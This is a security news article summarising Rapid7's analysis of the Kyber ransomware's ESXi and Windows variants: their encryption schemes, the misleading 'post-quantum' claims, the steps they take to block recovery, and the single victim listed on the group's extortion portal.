**Rapid7** researchers analyzed two distinct **Kyber** variants in March 2026 during an incident response. Both variants were deployed on the same network, with one specifically targeting VMware ESXi environments and the other focusing on Windows file servers. ### ESXi Variant: VMware-Focused Encryption "The ESXi variant is specifically built for VMware environments, with capabilities for datastore encryption, optional virtual machine termination, and defacement of management interfaces," explains **Rapid7**. The ESXi variant enumerates all virtual machines (VMs), encrypts datastore files, and defaces the ESXi interfaces with ransom notes to guide victims through the ransom payment and recovery process.  _**Kyber ransomware victim extortion portal** Source: BleepingComputer.com_ ### Post-Quantum Claims and Reality While the ransomware advertises 'post-quantum' encryption based on **Kyber1024** key encapsulation, **Rapid7** discovered that these claims are misleading for the Linux ESXi encryptor. The Linux version uses ChaCha8 for file encryption and RSA-4096 for key wrapping. Small files (<1 MB) are fully encrypted with the '.xhsyw' extension, while larger files undergo partial or intermittent encryption based on size and operator configuration.  _**Ransom note embedded in the ELF binary** Source: Rapid7_ ### Windows Variant: Rust-Based and Potentially More Sophisticated The Windows variant, written in Rust, implements **Kyber1024** and X25519 for key protection, aligning with the ransom note's claims. "This confirms that **Kyber** is not used for direct file encryption. Instead, **Kyber1024** protects the symmetric key material, while AES-CTR handles bulk data encryption," **Rapid7** explains. Regardless of whether RSA or **Kyber1024** is used, files remain unrecoverable without the attacker's private key. The Windows variant appends the '.#~~~' extension to encrypted files, terminates services, deletes backups, and includes an experimental feature to shut down Hyper-V virtual machines. It's designed to eliminate data recovery paths by deleting shadow copies, disabling boot repair, killing SQL, Exchange, and backup services, clearing event logs, and wiping the Windows Recycle Bin.  _**Kyber for Windows CLI** Source: Rapid7_ **Kyber**'s Windows variant also uses an unusual mutex, referencing a song on the Boomplay music platform, according to **Rapid7**. Overall, the Windows variant appears more technically mature than the ESXi variant. Currently, only one victim is listed on the **Kyber** data extortion portal: a multi-billion-dollar American defense contractor and IT services provider.